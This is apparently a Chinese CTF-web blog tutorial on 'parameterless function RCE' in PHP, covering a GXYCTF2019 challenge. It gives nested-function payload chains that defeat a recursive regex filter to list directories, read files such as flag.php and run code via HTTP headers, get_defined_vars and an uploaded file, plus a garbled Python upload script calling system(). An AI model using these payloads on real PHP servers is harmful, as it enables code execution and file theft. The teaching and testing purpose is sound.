无参数函数RCE

最新推荐文章于 2024-08-11 18:05:56 发布
最新推荐文章于 2024-08-11 18:05:56 发布
阅读量2k 收藏 13
点赞数 2
分类专栏: CTF-web 渗透之路 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124133822
版权

目录

题目特征:

基础函数学习

方法一:array_rand()

array_filp()

方法二:getallheaders()

方法三:get_defined_vars()

例题:

[GXYCTF2019]禁止套娃 无参数RCE

粗略两种方法:
1.利用超全局变量进行bypass,进行RCE
2.进行任意文件读取

题目特征:

遇到如下限制

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

我们会发现我们使用参数则无法通过正则的校验

/[^\W]+\((?R)?\)/

而该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数

a(b(c()));

a();

但不允许 携带参数!

这样我们只能使用无参数RCE,难度徒增!

基础函数学习

  • localeconv() 函数返回一包含本地数字及货币格式信息的数组。
  • scandir() 列出 images 目录中的文件和目录。
  • readfile()  输出一个文件。
  • current() 返回数组中的当前单元, 默认取第一个值。
  • pos() current() 的别名。
  • next() 函数将内部指针指向数组中的下一个元素,并输出。
  • array_reverse()以相反的元素顺序返回数组。
  • highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。
  • current(localeconv())   永远都是个点
  • localeconv()    函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
  • current()     返回数组中的当前单元, 默认取第一个值。
  • pos()      是current()的别名。
  • var_dump()是判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型.此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。

〇、非常规操作
https://blog.csdn.net/kali_Ma/article/details/122544274


目录操作:
getchwd() :函数返回当前工作目录。
scandir() :函数返回指定目录中的文件和目录的数组。
dirname() :函数返回路径中的目录部分。
chdir() :函数改变当前的目录。


数组相关的操作:
end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
array_shift() - 删除数组中第一个元素,并返回被删除元素的值。


读文件:
show_source() - 对文件进行语法高亮显示。
readfile() - 输出一个文件。
highlight_file() - 对文件进行语法高亮显示。
file_get_contents() - 把整个文件读入一个字符串中。
readgzfile() - 可用于读取非 gzip 格式的文件

print_r(det_defined_vars());  打印所有可用的变量
scandir()


文件读取查看当前目录文件名
print_r(scandir(current(localeconv())));


当前目录倒数第一位文件:
show_source(end(scandir(getcwd())));

当前目录倒数第二位文件:
show_source(next(array_reverse(scandir(getcwd()))));


随机返回当前目录文件:
highlight_file(array_rand(array_flip(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(current(localeconv())))));


查看上一级目录文件名
print_r( );
print_r(scandir(next(scandir(getcwd()))));
print_r(scandir(next(scandir(getcwd()))));


读取上级目录文件
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));

payload解释:
● array_flip():交换数组中的键和值,成功时返回交换后的数组,如果失败返回 NULL。
● array_rand():从数组中随机取出一个或多个单元,如果只取出一个(默认为1),array_rand() 返回随机单元的键名。 否则就返回包含随机键名的数组。 完成后,就可以根据随机的键获取数组的随机值。
● array_flip()和array_rand()配合使用可随机返回当前目录下的文件名
● dirname(chdir(dirname()))配合切换文件路径查看和读取根目录文件


所获得的字符串第一位有几率是/,需要多试几次
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));

方法一:array_rand()

效果如下

 不想要下标,我想要数组的值,那么我们可以使用

array_filp()

两者结合使用,即可出现数组的

方法二:getallheaders()

之前我们获取的是所有环境变量的列表,但其实我们并不需要这么多信息。仅仅http header即可
在apache2环境下,我们有函数getallheaders()可返回
我们可以看一下返回值

1
2
3
4
5
6
7
8
9

array(8) { 
    ["Host"]=> string(14) "106.14.114.127" 
    ["Connection"]=> string(10) "keep-alive" 
    ["Cache-Control"]=> string(9) "max-age=0" 
    ["Upgrade-Insecure-Requests"]=> string(1) "1" 
    ["User-Agent"]=> string(120) "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
    ["Accept"]=> string(118) "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
     ["Accept-Encoding"]=> string(13) "gzip, deflate" ["Accept-Language"]=> string(14) "zh-CN,zh;q=0.9" 
}

我们可以看到,成功返回了http header,我们可以在header中做一些自定义的手段,例如

 我们再将结果中的恶意命令取出

var_dump(end(getallheaders()));

 这样一来相当于我们将http header中的sky变成了我们的参数,可用其进行bypass 无参数函数执行
例如

那么可以进一步利用http header的sky属性进行rce

方法三:get_defined_vars()

使用 getallheaders ( ) 其实具有局限性,因为他是 apache 的函数,如果目标中间件不为 apache,那么这种方法就会失效,我们也没有更加普遍的方式呢?

这里我们可以使用 get_defined_vars ( ) ,首先看一下它的回显。

发现其可以回显全局变量有如下几种:

$_GET  $_POST    $_FILES    $_COOKIE

我们这里的选择也就具有多样性,可以利用 $_GET 进行 RCE,例如:

还是和之前的思路一样,将恶意参数取出。

发现可以成功 RCE。

但一般网站喜欢对如下超全局变量做全局过滤:

$_GET $_POST $_COOKIE

所以我们可以尝试从 $_FILES 下手,这就需要我们自己写一个上传:

可以发现空格会被替换成下划线 _ ,为防止干扰我们用 hex 编码进行 RCE。

最终脚本如下:

import requests from io 
import BytesIO 

payload = "system('ls /tmp');".encode('hex') 
files = { payload: BytesIO ( ’ sky cool! ’ ) } 

r = requests.post ('http://localhost/skyskysky.php?code=eval ( hex2bin ( array_rand ( end ( get_defined_vars() ))));',files=files, allow_redirects=False ) 

print r.content


//?code=eval(hex2bin(array_rand(end(get_defined_vars()))));',files=files, allow_redirects=False

例题:

[GXYCTF2019]禁止套娃 无参数RCE

分析源码:

  1. GET方式传入exp参数,若满足条件,则将exp内容当做php代码来执行。
  2. 过滤了data/filter/php/phar伪协议,不能以伪协议直接读取文件。
  3. (?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
  4. 正则匹配还过滤了et/na/info等关键字,导致get等很多函数用不了
  5. eval($_GET[‘exp’]); 典型的无参数RCE
     

一、首先需要得到当前目录下的文件
scandir()函数可以扫描当前目录下的文件,例如:

<?php
print_r(scandir('.'));
?>

但是要如何构造scandir('.'),这里有个‘.’直接传入就相当于还是传入一个参数,exp还是被过滤掉了,所以我们要想个其他的方法代替'.'

这里涉及到一个知识点:
current(localeconv())永远都是个点
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值。
pos()是current()的别名。
pos(localeconv())和current(localeconv())的结果一样,都是表示'.'
所以这两个函数嵌套使用就是一个'.'

那么我们第一步就解决了:

print_r(scandir(current(localeconv())));
print_r(scandir(pos(localeconv())));


接下来就是如和读取到倒数第二个数组呢?

array_flip():交换数组中的键和值。


此时将键和值做了一下交换,下一步就是如何取出他的键。

array_rand():从数组中随机取出一个或多个单元

最后一个问题,如何读取flag.php的源码。
由于et被过滤掉了,所以不能使用file_get_contents(),但是可以市容readfile()或highlight_file()以及其别名函数show_source()。
有了以上的函数,我们就可以将这些函数组合起来读取flag了。

?exp=show_source(array_rand(array_flip(scandir(pos(localeconv())))));
?exp=highlight_file(array_rand(array_flip(scandir(pos(localeconv())))));


由于是使用array_rand()函数随机取出键值,所以可能需要多刷新几次才能取出flag.php。

菜菜zhao
关注
专栏目录
无参 RCE
snowlyzz的博客
08-07 647
无参rce
参数rce
qi_SJQ_的博客
08-10 281
getcwd():返回当前目录的绝对路径------返回路径 scandir() :列出指定路径中的文件和目录,返回的是数组!-----利用路径(目录) print_r() :以易于理解的格式打印变量-----输出 怎么构造? localeconv() :返回一包含本地数字及货币格式信息的数组,而数组第一项就是".",因此要再用一个函数取出这个点。可以current(localeconv())返回“.”。 故:var_dump(scandir(current(localeconv())));----遍历当
参数RCE知识点
m0_75178803的博客
12-12 808
无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数函数套娃就可以达到命令执行的效果。
RCE之无参数读取文件总结
最新发布
qq_67758645的博客
08-11 1118
顾名思义,就是只使用函数,且函数不能带有参数举个栗子:phpif(';R)??这里使用preg_replace替换匹配到的字符为空,\w([^\W])匹配字母、数字和下划线,等价于 A-Za-z0-9_,然后(?R)?这个意思为递归整个匹配模式所以正则的含义就是匹配无参数函数,内部可以无限嵌套相同的模式(无参数函数),将匹配的替换为空,判断剩下的是否只有;所以我们要使用无参数函数进行文件读取或者命令执行栗子:aaa(bbb(ccc()));
参数RCE
qq_52579508的博客
07-02 392
就会被eval执行,但相反,像a(b(‘111’));简单来说就是把恶意代码写到COOKIE的PHPSESSID中,然后利用session_id()这个函数去读取它,返回一个字符串,然后我们就可以用eval去直接执行了,这里有一点要注意的就是session_id()要开启session才能用,所以说要先session_start()。这里我们就需要先将二维数组转换为一维数组,这里我们用到current()函数,这个函数的作用是返回数组中的当前单元,而它的默认是第一个单元,也就是我们GET方式传入的参数
[ctf web]从 [GXYCTF2019]禁止套娃 开始的无参数函数RCE
ShenZ的博客
08-15 388
参数函数RCE [GXYCTF2019]禁止套娃 wp 无参数函数RCE sky大佬yyds!rce一定要看大佬的文章!!link
初探无参数RCE
weixin_46330722的博客
12-07 2843
概念 所谓无参数RCE,就是通过没有参数函数达到命令执行的目的。这类题目的关键代码一般长这样,后面都用这串代码当题目测试 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) { eval($_GET['exp']); } ?> 简单解释一下这串代码。这串代码就是检查了我们通过GET方式传入的exp参数的值,如果传进去的值是传进去的值是一个字符串接一个(),那么这个字符串就会被替换为空
参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 953
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
php无参数函数实现rce,浅谈无参数RCE
weixin_30568317的博客
04-02 1998
0x00 前言这几天做了几道无参数RCE的题目,这里来总结一下,以后忘了也方便再捡起来。首先先来解释一下什么是无参数RCE:形式:if(';' === preg_replace('/[^W]+((?R)?)/', '', $_GET['code'])) { eval($_GET['code']);}preg_replace('/[a-z]+((?R)?)/', NULL, $code)pre_ma...
rce所用函数
qi_SJQ_的博客
10-30 288
(1)对于数组的函数: current() //返回数组中的当前单元,默认取第一个值。 reset() //将数组的内部指针指向第一个单元。 end() //将数组的内部指针指向最后一个单元。 next() //将数组中的内部指针向前移动一位。 prev() //将数组内部指针倒回一位。 array_reserve():将数组反转,第一位变成最后一位. array_flip() array_rand() :从数组中取出一个或多个随机的单元,并返回随机条目的一个或多个键(即数字)。 (2)常见函
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
参数绕过RCE
m0_73756016的博客
04-07 1069
顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等无参数题目特征if(';R)?代码解析这里使用替换匹配到的字符为空,\w匹配字母、数字和下划线,等价于,然后R)?这个意思为递归整个匹配模式eg:[^\W]+\(?\)匹配到"a()"形式的字符串,但是()不能内出现任何参数(?R)代表递归,即a(b(c()))都能匹配到使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;
初学无参数RCE
m0_62709637的博客
05-12 543
前置知识: 1、文件读取函数: show_source(): highlight_file():对文件进行语法高亮显示; readfile(): file_get_contents(): file(): tips:show_source()和highlight_file()函数无法直接在页面输出需要配合echo()等函数一同使用; 2、写题时常用的输出函数: print_r(): var_dump(): echo(): 3、无参数rce常见正则匹配 1、'/[^\W]+\((?R)?\
Byte CTF boring_code(fuzz,无参数RCE)
a3320315的博客
11-09 2012
0x01 贴出代码 <?php function is_valid_url($url) { if (filter_var($url, FILTER_VALIDATE_URL)) { if (preg_match('/data:\/\//i', $url)) { return false; } return true; } return false; } if (is...
php无参数函数实现rce,PHP Parametric Function RCE
weixin_42303721的博客
04-02 596
前言最近做了一些 php 无参数函数执行的题目,这里做一个总结,以便以后 bypass 各种正则过滤。大致思路如下:1. 利用超全局变量进行 bypass,进行 RCE2. 进行任意文件读取什么是无参数函数 RCE传统意义上,如果我们有:eval ( $_GET [ ’ code ’ ] ) ;即代表我们拥有了 " 一句话木马 ",可以进行 getshell,例如:但是如果有如下限制:if ( ’...
无参rce总结
weixin_66839513的博客
04-10 833
if(';R)?正则表达式 [^\W]+\((?R)?\) 匹配了一个或多个(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值